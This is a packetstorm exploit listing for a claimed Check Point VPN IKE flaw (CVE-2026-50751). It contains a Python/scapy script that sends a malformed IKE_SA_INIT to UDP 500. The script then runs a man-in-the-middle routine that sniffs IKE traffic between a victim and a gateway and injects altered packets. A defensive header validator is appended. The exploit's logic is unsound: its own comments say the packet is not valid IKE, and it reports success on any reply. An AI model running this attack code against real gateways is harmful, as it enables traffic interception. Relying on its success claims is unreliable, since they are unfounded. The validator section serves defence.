📄 Check Point VPN IKE Logic Flaw

Reported: 12 Jun 2026 00:00:00 by indoushka
Type: packetstorm
Source: packetstorm.news

Check Point VPN exploit CVE-2026-50751 sends malformed IKE_SA_INIT to UDP 500 for MITM interception.

Code
==================================================================================================================================
    | # Title     : Check Point VPN IKE Legacy Auth Exploit                                                                          |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : No standalone download available                                                                                 |
    ==================================================================================================================================
    
    [+] Summary    :  A Python script attempting to exploit a vulnerability in Check Point VPN (CVE-2026-50751) by sending a malformed
                      IKE_SA_INIT packet to UDP port 500, treating any response from the target as an indicator of exploitability,
                      then running a MITM attack that intercepts IKE packets between a victim and a VPN gateway.
    
    
    [+] POC        :  
    
    #!/usr/bin/env python3
    
    import random
    import struct
    import sys
    from scapy.all import IP, UDP, Raw, send, sniff, sr1
    from cryptography.hazmat.primitives.asymmetric import x25519
    
    class CVE202650751Exploit:
        def __init__(self, target_ip, target_port=500):
            self.target_ip = target_ip
            self.target_port = target_port
    
        def create_ike_sa_init(self):
            """Build the fake IKE_SA_INIT datagram.
    
            The "header" is four single bytes followed by three big-endian 32-bit words
            (16 bytes), then an 8-byte "legacy" payload. A real IKEv2 header is 28 bytes
            (RFC 7296), so this datagram does not parse as a genuine IKE_SA_INIT."""
            ike_header = struct.pack('!BBBB I I I',
                0x20,        # four single-byte fields
                0x20,
                0x00,
                0x00,
                0x00000001,  # three 32-bit words
                0x00000000,
                0x00000001
            )
            legacy_payload = bytes([
                0x20,                    # payload type byte
                0x00,                    # reserved
                0x00, 0x04,              # declared length (4)
                0x01, 0x02, 0x03, 0x04   # payload body
            ])
            return ike_header + legacy_payload
    
        def exploit_legacy_auth(self):
            """Send the malformed IKE_SA_INIT and treat any reply as a sign of exploitability."""
            print(f"[*] Targeting {self.target_ip}:{self.target_port}")
            # An X25519 key pair is generated but never used in the exchange.
            private_key = x25519.X25519PrivateKey.generate()
            public_key = private_key.public_key()
            packet = IP(dst=self.target_ip)/UDP(sport=random.randint(45000, 65535), dport=self.target_port)
            ike_data = self.create_ike_sa_init()
            print("[*] Sending malicious IKE packet...")
            try:
                # sr1() sends at layer 3 and waits up to 3 s for the first reply.
                response = sr1(packet/Raw(load=ike_data), timeout=3, verbose=0)
                if response:
                    print("[+] Received response - Target may be vulnerable")
                    return True
            except Exception as e:
                print(f"[-] Exploit failed: {e}")
            return False
    
        def mitm_attack(self, victim_ip, vpn_gateway):
            """Sniff UDP/500 traffic between victim and gateway and reflect each IKE
            datagram back to its sender with addresses swapped and 7 bytes appended."""
            print(f"[*] Starting MITM attack between {victim_ip} and {vpn_gateway}")
            def packet_handler(pkt):
                # Raw must be present: datagrams with no payload would raise on pkt[Raw].
                if IP in pkt and UDP in pkt and Raw in pkt:
                    if pkt[UDP].dport == 500 or pkt[UDP].sport == 500:
                        print(f"[+] Intercepted IKE packet from {pkt[IP].src}")
                        modified_payload = pkt[Raw].load + b'\x00\x00\x00\x01BAD'
                        send(IP(src=pkt[IP].dst, dst=pkt[IP].src)/
                             UDP(sport=pkt[UDP].dport, dport=pkt[UDP].sport)/
                             Raw(load=modified_payload), verbose=0)
    
            sniff(filter=f"host {victim_ip} and host {vpn_gateway} and port 500",
                  prn=packet_handler, store=0)
    
    def main():
        if len(sys.argv) < 2:
            print(f"Usage: {sys.argv[0]} <target_ip> [victim_ip]")
            sys.exit(1)
        exploit = CVE202650751Exploit(sys.argv[1])
    
        if exploit.exploit_legacy_auth():
            print("\n[!] VULNERABLE - Legacy client authentication bypass possible!")
            print("[!] CVE-2026-50751 exploitation successful")
    
            if len(sys.argv) == 3:
                print(f"[*] Initiating MITM attack against {sys.argv[2]}")
                exploit.mitm_attack(sys.argv[2], sys.argv[1])
        else:
            print("\n[+] Target appears patched or not vulnerable")
    
    if __name__ == "__main__":
        main()
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================
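A defender-side check, added here and not part of the packetstorm listing, that validates the IKEv2 fixed header of a UDP/500 datagram and reports why a datagram is not a well-formed IKE_SA_INIT; the sample datagrams, including one shaped like the 24-byte datagram the PoC above emits, are constructed for the example.

```python
import struct

# IKEv2 fixed header (RFC 7296 section 3.1): SPIi, SPIr, next payload,
# version, exchange type, flags, message id, length.
IKE_HDR = struct.Struct("!8s8sBBBBII")
IKE_HDR_LEN = IKE_HDR.size              # 28 bytes
IKEV2_VERSION = 0x20                    # major 2, minor 0
EXCH_IKE_SA_INIT = 34
FLAG_INITIATOR = 0x08

def classify_ike_sa_init(payload: bytes) -> str:
    """Return 'ok' or the first reason a UDP/500 payload is not a
    well-formed IKEv2 IKE_SA_INIT request. Only the fixed header is checked."""
    if len(payload) < IKE_HDR_LEN:
        return f"truncated header ({len(payload)} < {IKE_HDR_LEN} bytes)"
    spi_i, spi_r, next_pl, version, exch, flags, msg_id, length = IKE_HDR.unpack_from(payload)
    if version != IKEV2_VERSION:
        return f"unexpected version byte 0x{version:02x}"
    if exch != EXCH_IKE_SA_INIT:
        return f"exchange type {exch} is not IKE_SA_INIT"
    if length != len(payload):
        return f"length field {length} != datagram length {len(payload)}"
    if msg_id != 0:
        return f"IKE_SA_INIT must carry message id 0, got {msg_id}"
    if spi_i == bytes(8):
        return "initiator SPI is zero"
    if flags & FLAG_INITIATOR and spi_r != bytes(8):
        return "responder SPI set in an initiator request"
    if next_pl != 0 and len(payload) == IKE_HDR_LEN:
        return f"next payload {next_pl} declared but no payload present"
    return "ok"

def build_ike_sa_init(spi_i: bytes, body: bytes, next_payload: int = 33) -> bytes:
    """Constructed sample initiator request: valid header plus an opaque payload body."""
    hdr = IKE_HDR.pack(spi_i, bytes(8), next_payload, IKEV2_VERSION,
                       EXCH_IKE_SA_INIT, FLAG_INITIATOR, 0, IKE_HDR_LEN + len(body))
    return hdr + body

# Constructed inputs: a plausible request, and a datagram with the same layout as
# the 16-byte pseudo-header plus 8-byte trailer produced by the PoC above.
GOOD_REQUEST = build_ike_sa_init(b"\x11" * 8, struct.pack("!BBH", 0, 0, 8) + bytes(4))
POC_SHAPED = (struct.pack("!BBBBIII", 0x20, 0x20, 0, 0, 1, 0, 1)
              + bytes([0x20, 0x00, 0x00, 0x04, 0x01, 0x02, 0x03, 0x04]))

if __name__ == "__main__":
    for name, dgram in (("good", GOOD_REQUEST), ("poc-shaped", POC_SHAPED)):
        print(f"{name}: {classify_ike_sa_init(dgram)}")
```

The same function can be wired into a scapy sniff callback or a PCAP loop to flag UDP/500 datagrams that fail header validation before they reach a gateway.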


Vulners AI Score: 5.7 (Medium risk)
CVSS 3.1: 9.3
EPSS: 0.11841